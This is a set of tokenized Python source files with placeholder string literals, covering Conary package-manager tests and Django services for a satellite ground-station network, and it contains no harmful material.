<EOL> c = FileContainer ( f ) <EOL> name , tag , f = c . getNextFile ( ) <EOL> assert ( name == names [ <NUM_LIT:0> ] ) <EOL> def testLargeFiles ( self ) : <EOL> class SparseFile ( util . ExtendedFile ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . needsWrite = False <EOL> util . ExtendedFile . __init__ ( self , * args , ** kwargs ) <EOL> def write ( self , s ) : <EOL> if len ( s ) > <NUM_LIT:100> and s [ <NUM_LIT:0> ] == '<STR_LIT>' and s [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> self . seek ( len ( s ) - <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . needsWrite = True <EOL> return len ( s ) <EOL> return util . ExtendedFile . write ( self , s ) <EOL> def close ( self ) : <EOL> if self . needsWrite : <EOL> self . write ( '<STR_LIT>' ) <EOL> self . needsWrite = False <EOL> def seek ( self , * args ) : <EOL> if self . needsWrite : <EOL> self . 
write ( '<STR_LIT>' ) <EOL> self . needsWrite = False <EOL> return util . ExtendedFile . seek ( self , * args ) <EOL> class FalseFile : <EOL> def __init__ ( self , size ) : <EOL> self . size = size <EOL> self . offset = <NUM_LIT:0> <EOL> def seek ( self , offset , whence = <NUM_LIT:0> ) : <EOL> assert ( whence == <NUM_LIT:0> ) <EOL> self . offset = offset <EOL> def read ( self , bytes ) : <EOL> self . offset += bytes <EOL> if self . offset > self . size : <EOL> self . offset -= bytes <EOL> bytes = self . size - self . offset <EOL> self . offset = self . size <EOL> return "<STR_LIT>" * bytes <EOL> f = SparseFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> totalSize = <NUM_LIT> <EOL> c . addFile ( '<STR_LIT:test>' , FromFile ( FalseFile ( totalSize ) ) , '<STR_LIT>' , <EOL> precompressed = True ) <EOL> c . addFile ( '<STR_LIT:end>' , FromString ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> precompressed = True ) <EOL> c . close ( ) <EOL> c = FileContainer ( util . ExtendedFile ( self . fn , '<STR_LIT:r>' , buffering = False ) ) <EOL> name , tag , f = c . getNextFile ( ) <EOL> storedSize = f . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert ( storedSize == totalSize ) <EOL> assert ( tag == '<STR_LIT>' ) <EOL> name , tag , f = c . getNextFile ( ) <EOL> assert ( name == '<STR_LIT:end>' ) <EOL> assert ( tag == '<STR_LIT>' ) <EOL> s = f . read ( ) <EOL> assert ( s == '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> os . unlink ( self . fn ) </s>
<s> from testrunner import testhelp <EOL> import os <EOL> import grp , pwd <EOL> from conary_test import rephelp <EOL> from conary_test . rephelp import RegularFile as RegF <EOL> class SharedFileTest ( rephelp . RepositoryHelper ) : <EOL> def owners ( self , path ) : <EOL> db = self . openDatabase ( ) <EOL> return set ( x [ <NUM_LIT:0> : <NUM_LIT:3> ] for x in db . iterFindPathReferences ( <EOL> path , justPresent = True ) ) <EOL> def checkOwners ( self , path , troves ) : <EOL> assert ( self . owners ( path ) == <EOL> set ( x . getNameVersionFlavor ( ) for x in troves ) ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testBasicSharedFiles ( self ) : <EOL> foo1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> bar1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> baz1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> foo2 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:1> ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:0> ) <EOL> assert ( not os . path . exists ( self . rootDir + '<STR_LIT>' ) ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , foo1 ] ) <EOL> self . updatePkg ( '<STR_LIT>' , keepExisting = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , baz1 , foo1 ] ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo2 ] ) <EOL> self . rollback ( self . 
rootDir , <NUM_LIT:2> ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , baz1 , foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:1> ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 , foo1 ] ) <EOL> self . rollback ( self . rootDir , <NUM_LIT:0> ) <EOL> assert ( not os . path . exists ( self . rootDir + '<STR_LIT>' ) ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testSharedUpdate ( self ) : <EOL> foo1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> bar1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> foo2 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) ] ) <EOL> bar2 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) ] ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo2 , bar2 ] ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:2>' ) <EOL> self . rollback ( <NUM_LIT:1> ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo1 , bar1 ] ) <EOL> @ testhelp . context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testSharedErasures ( self ) : <EOL> foo1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> bar1 = self . addComponent ( '<STR_LIT>' , <EOL> fileContents = [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo1 , bar1 ] ) <EOL> self . erasePkg ( self . rootDir , '<STR_LIT>' ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ bar1 ] ) <EOL> @ testhelp . 
context ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testSharedHardLinks ( self ) : <EOL> info = { <EOL> '<STR_LIT:user>' : pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : grp . getgrgid ( os . getgid ( ) ) [ <NUM_LIT:0> ] , <EOL> } <EOL> foo = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' , <EOL> fileContents = [ <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:1>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> , owner = info [ '<STR_LIT:user>' ] , <EOL> group = info [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:2>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> ) ) , <EOL> ] <EOL> ) <EOL> bar = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' , <EOL> fileContents = [ <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:1>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> , owner = info [ '<STR_LIT:user>' ] , <EOL> group = info [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , rephelp . RegularFile ( contents = "<STR_LIT>" , pathId = "<STR_LIT:2>" , <EOL> linkGroup = "<STR_LIT>" * <NUM_LIT:16> ) ) , <EOL> ] <EOL> ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , keepExisting = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> groupRecipe = r"""<STR_LIT>""" <EOL> built , d = self . buildRecipe ( groupRecipe , "<STR_LIT>" ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testSharedIntialContents ( self ) : <EOL> foo = self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT:hello>' , initialContents = True ) ) ] ) <EOL> bar = self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , initialContents = True ) ) ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> self . 
resetRoot ( ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( [ '<STR_LIT>' , '<STR_LIT>' ] , justDatabase = True ) <EOL> self . checkOwners ( '<STR_LIT>' , [ foo , bar ] ) <EOL> groupRecipe = r"""<STR_LIT>""" <EOL> built , d = self . buildRecipe ( groupRecipe , "<STR_LIT>" ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testSharedFileDifferentContentTypes ( self ) : <EOL> info = { <EOL> '<STR_LIT>' : pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : grp . getgrgid ( os . getgid ( ) ) [ <NUM_LIT:0> ] , <EOL> } <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT:hello>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' , ** info ) ) ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . resetRoot ( ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> @ testhelp . 
context ( '<STR_LIT>' ) <EOL> def testDoubleReplaceFiles ( self ) : <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT:hello>' ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' ) ) ] ) <EOL> self . addComponent ( '<STR_LIT>' , fileContents = [ <EOL> ( '<STR_LIT>' , RegF ( contents = '<STR_LIT>' ) ) ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' , replaceFiles = True ) <EOL> self . verifyFile ( self . rootDir + '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> filters = ( '<STR_LIT>' , ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> follows = ( '<STR_LIT>' , ) <EOL> precedes = ( '<STR_LIT:data>' , ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from services . accounts import decorators as account_decorators <EOL> from django . contrib . auth import models as auth_models <EOL> from django . contrib . sites import models as site_models <EOL> from django . forms import models as form_models <EOL> from django . shortcuts import get_object_or_404 <EOL> import logging <EOL> import json <EOL> from jsonview import decorators , exceptions <EOL> from services . accounts import models , utils <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> @ decorators . json_view <EOL> @ account_decorators . login_required <EOL> def user_details ( request ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( __name__ + '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in request . GET : <EOL> raise exceptions . BadRequest ( "<STR_LIT>" ) <EOL> user_id = request . GET [ '<STR_LIT>' ] <EOL> logger . info ( __name__ + '<STR_LIT>' + user_id ) <EOL> user = get_object_or_404 ( models . UserProfile , pk = user_id ) <EOL> fields = [ '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ] <EOL> user_dict = form_models . model_to_dict ( user , fields ) <EOL> user_dict [ '<STR_LIT>' ] = str ( user . country . name ) <EOL> return user_dict <EOL> @ decorators . json_view <EOL> @ account_decorators . login_required <EOL> def user_verification ( request ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( __name__ + '<STR_LIT>' ) <EOL> for x in request . POST : <EOL> print ( ( x , '<STR_LIT::>' , request . POST [ x ] ) ) <EOL> if '<STR_LIT>' not in request . POST : <EOL> print ( ( __name__ + '<STR_LIT>' ) ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> value = str ( request . POST [ '<STR_LIT>' ] ) <EOL> user_list = json . loads ( value ) <EOL> if site_models . Site . _meta . installed : <EOL> site = site_models . Site . objects . get_current ( ) <EOL> else : <EOL> site = site_models . RequestSite ( request ) <EOL> v_users = [ ] <EOL> for user_id in user_list : <EOL> utils . 
allauth_confirm_email ( <EOL> auth_models . User . objects . get ( pk = user_id ) , request <EOL> ) <EOL> u_profile = get_object_or_404 ( models . UserProfile , pk = user_id ) <EOL> u_profile . save ( ) <EOL> v_users . append ( user_id ) <EOL> j_v_users = json . dumps ( v_users ) <EOL> result = dict ( user_list = j_v_users ) <EOL> print ( ( __name__ + '<STR_LIT>' + j_v_users ) ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from django . test import TestCase <EOL> from services . common import pusher as satnet_pusher <EOL> class TestPusher ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> self . __push_service = satnet_pusher . PushService ( ) <EOL> self . __ch_name = '<STR_LIT>' <EOL> self . __ev_name = '<STR_LIT>' <EOL> self . __ev_data = { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } <EOL> def test_basic ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __push_service . test_service ( ) <EOL> def test_connection ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __push_service . trigger_event ( <EOL> self . __ch_name , self . __ev_name , self . __ev_data <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import rpc4django <EOL> from services . configuration . models import rules as rule_models <EOL> from services . configuration . models import segments as segment_models <EOL> from services . configuration . jrpc . serializers import rules as rule_serializers <EOL> from website import settings as satnet_settings <EOL> @ rpc4django . rpcmethod ( <EOL> name = '<STR_LIT>' , <EOL> signature = [ '<STR_LIT>' ] , <EOL> login_required = satnet_settings . JRPC_LOGIN_REQUIRED <EOL> ) <EOL> def list_channel_rules ( groundstation_id ) : <EOL> """<STR_LIT>""" <EOL> return rule_serializers . serialize_rules ( <EOL> rule_models . AvailabilityRule . objects . filter ( <EOL> groundstation = segment_models . GroundStation . objects . get ( <EOL> identifier = groundstation_id <EOL> ) <EOL> ) <EOL> ) <EOL> @ rpc4django . rpcmethod ( <EOL> name = '<STR_LIT>' , <EOL> signature = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> login_required = satnet_settings . JRPC_LOGIN_REQUIRED <EOL> ) <EOL> def add_rule ( groundstation_id , rule_cfg ) : <EOL> """<STR_LIT>""" <EOL> op , periodicity , dates = rule_serializers . deserialize_rule_cfg ( rule_cfg ) <EOL> rule = rule_models . AvailabilityRule . objects . create ( <EOL> segment_models . GroundStation . objects . get ( identifier = groundstation_id ) , <EOL> op , periodicity , dates <EOL> ) <EOL> return rule . pk <EOL> @ rpc4django . rpcmethod ( <EOL> name = '<STR_LIT>' , <EOL> signature = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> login_required = satnet_settings . JRPC_LOGIN_REQUIRED <EOL> ) <EOL> def remove_rule ( groundstation_id , rule_id ) : <EOL> """<STR_LIT>""" <EOL> rule_models . AvailabilityRule . objects . get ( <EOL> pk = rule_id , <EOL> groundstation = segment_models . GroundStation . objects . get ( <EOL> identifier = groundstation_id <EOL> ) <EOL> ) . delete ( ) <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import logging <EOL> from periodically import decorators <EOL> from services . configuration . models import tle as tle_models <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> @ decorators . daily ( ) <EOL> def update_tle_database ( ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> tle_models . TwoLineElementsManager . load_celestrak ( ) <EOL> logger . info ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import datetime <EOL> import difflib <EOL> import logging <EOL> import pytz <EOL> from django import test <EOL> from django . core import exceptions as django_ex <EOL> from services . common import misc , helpers as db_tools <EOL> from services . configuration . models import tle as tle_models <EOL> from services . leop import utils as launch_utils <EOL> from services . leop . jrpc . serializers import launch as launch_serial <EOL> from services . leop . jrpc . serializers import messages as messages_serial <EOL> from services . leop . jrpc . views import launch as launch_jrpc <EOL> from services . leop . jrpc . views import messages as messages_jrpc <EOL> from services . leop . models import launch as launch_models <EOL> from services . simulation . models import groundtracks as simulation_models <EOL> from website import settings as satnet_settings <EOL> class TestLaunchViews ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> satnet_settings . JRPC_PERMISSIONS = True <EOL> self . __user = db_tools . create_user_profile ( ) <EOL> self . __request_1 = db_tools . create_request ( user_profile = self . __user ) <EOL> self . __gs_1_id = '<STR_LIT>' <EOL> self . __gs_1 = db_tools . create_gs ( <EOL> user_profile = self . __user , <EOL> identifier = self . __gs_1_id <EOL> ) <EOL> self . __gs_2_id = '<STR_LIT>' <EOL> self . __gs_2 = db_tools . create_gs ( <EOL> user_profile = self . __user , <EOL> identifier = self . __gs_2_id <EOL> ) <EOL> self . __admin = db_tools . create_user_profile ( <EOL> username = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> is_staff = True <EOL> ) <EOL> self . __request_2 = db_tools . create_request ( user_profile = self . __admin ) <EOL> self . __leop_tle_l1 = db_tools . ISS_TLE [ <NUM_LIT:0> ] <EOL> self . __leop_tle_l2 = db_tools . ISS_TLE [ <NUM_LIT:1> ] <EOL> self . 
__leop_id = '<STR_LIT>' <EOL> self . __leop_date = pytz . utc . localize ( datetime . datetime . today ( ) ) <EOL> self . __leop = db_tools . create_launch ( <EOL> admin = self . __admin , identifier = self . __leop_id , <EOL> date = self . __leop_date , <EOL> tle_l1 = self . __leop_tle_l1 , tle_l2 = self . __leop_tle_l2 <EOL> ) <EOL> self . __leop_serial_date = str ( self . __leop . date . isoformat ( ) ) <EOL> self . __leop_cs = launch_utils . generate_cluster_callsign ( self . __leop_id ) <EOL> self . __leop_sc_id = launch_utils . generate_cluster_sc_identifier ( <EOL> self . __leop_id , self . __leop_cs <EOL> ) <EOL> self . __ufo_id = <NUM_LIT:1> <EOL> self . __ufo_sc_id = launch_utils . generate_object_sc_identifier ( <EOL> self . __leop_id , self . __ufo_id <EOL> ) <EOL> self . __ufo_callsign = '<STR_LIT>' <EOL> self . __ufo_tle_l1 = self . __leop_tle_l1 <EOL> self . __ufo_tle_l2 = self . __leop_tle_l2 <EOL> self . __leop_2_tle_l1 = db_tools . TIANGONG_TLE [ <NUM_LIT:0> ] <EOL> self . __leop_2_tle_l2 = db_tools . TIANGONG_TLE [ <NUM_LIT:1> ] <EOL> if not self . __verbose_testing : <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . CRITICAL ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . CRITICAL ) <EOL> def test_list_groundstations ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> launch_jrpc . list_groundstations ( '<STR_LIT>' , ** { '<STR_LIT>' : None } ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> try : <EOL> launch_jrpc . list_groundstations ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_1 } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> e_gs = { <EOL> launch_serial . JRPC_K_AVAILABLE_GS : [ <EOL> self . __gs_1_id , self . __gs_2_id <EOL> ] , <EOL> launch_serial . JRPC_K_IN_USE_GS : [ ] <EOL> } <EOL> try : <EOL> a_gs = launch_jrpc . list_groundstations ( <EOL> self . 
__leop_id , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> self . assertEqual ( a_gs , e_gs ) <EOL> except django_ex . PermissionDenied : <EOL> self . fail ( '<STR_LIT>' ) <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , groundstations = [ self . __gs_1_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> e_gs = { <EOL> launch_serial . JRPC_K_AVAILABLE_GS : [ self . __gs_2_id ] , <EOL> launch_serial . JRPC_K_IN_USE_GS : [ self . __gs_1_id ] <EOL> } <EOL> a_gs = launch_jrpc . list_groundstations ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> self . assertEqual ( a_gs , e_gs ) <EOL> def test_add_groundstations ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> launch_jrpc . add_groundstations ( <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : None } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> try : <EOL> launch_jrpc . add_groundstations ( <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : self . __request_1 } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> try : <EOL> launch_jrpc . add_groundstations ( <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except launch_models . Launch . DoesNotExist : <EOL> pass <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . add_groundstations , <EOL> None , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> gss = [ self . __gs_1_id , self . __gs_2_id ] <EOL> actual = launch_jrpc . add_groundstations ( <EOL> self . __leop_id , gss , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> expected = { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } <EOL> self . assertEqual ( actual , expected ) <EOL> cluster = launch_models . Launch . objects . get ( identifier = self . __leop_id ) <EOL> self . assertEqual ( <EOL> len ( cluster . groundstations . 
all ( ) ) , <NUM_LIT:2> , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_remove_groundstations ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> django_ex . PermissionDenied , <EOL> launch_jrpc . remove_groundstations , <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : None } <EOL> ) <EOL> self . assertRaises ( <EOL> django_ex . PermissionDenied , <EOL> launch_jrpc . remove_groundstations , <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : self . __request_1 } <EOL> ) <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , <EOL> launch_jrpc . remove_groundstations , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> actual = launch_jrpc . remove_groundstations ( <EOL> self . __leop_id , None , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> expected = { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } <EOL> self . assertEqual ( actual , expected ) <EOL> actual = launch_jrpc . remove_groundstations ( <EOL> self . __leop_id , [ ] , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> expected = { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } <EOL> self . assertEqual ( actual , expected ) <EOL> gss = [ self . __gs_1_id , self . __gs_2_id ] <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , gss , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> cluster = launch_models . Launch . objects . get ( identifier = self . __leop_id ) <EOL> self . assertEqual ( <EOL> len ( cluster . groundstations . all ( ) ) , <NUM_LIT:2> , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> launch_jrpc . remove_groundstations ( <EOL> self . __leop_id , gss , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> len ( cluster . groundstations . all ( ) ) , <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_add_unknown ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . add_unknown , self . 
__leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . add_unknown , self . __leop_id , - <NUM_LIT:1> <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:1> ) , <NUM_LIT:1> , <EOL> '<STR_LIT>' <EOL> ) <EOL> a_list = [ <EOL> a . identifier for a in launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . unknown_objects . all ( ) <EOL> ] <EOL> e_list = [ <NUM_LIT:1> ] <EOL> self . assertEqual ( a_list , e_list ) <EOL> def test_remove_unknown ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . remove_unknown , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . remove_unknown , self . __leop_id , - <NUM_LIT:1> <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . remove_unknown , self . __leop_id , <NUM_LIT:2> <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:1> ) , <NUM_LIT:1> , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> launch_jrpc . remove_unknown ( self . __leop_id , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> len ( launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . unknown_objects . all ( ) ) , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_update_ufo ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . update , None , None , None , None , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . update , <EOL> self . __leop_id , None , None , None , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . update , <EOL> self . __leop_id , self . __ufo_id , None , None , None <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_unknown ( self . __leop_id , self . __ufo_id ) , <EOL> self . __ufo_id , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . 
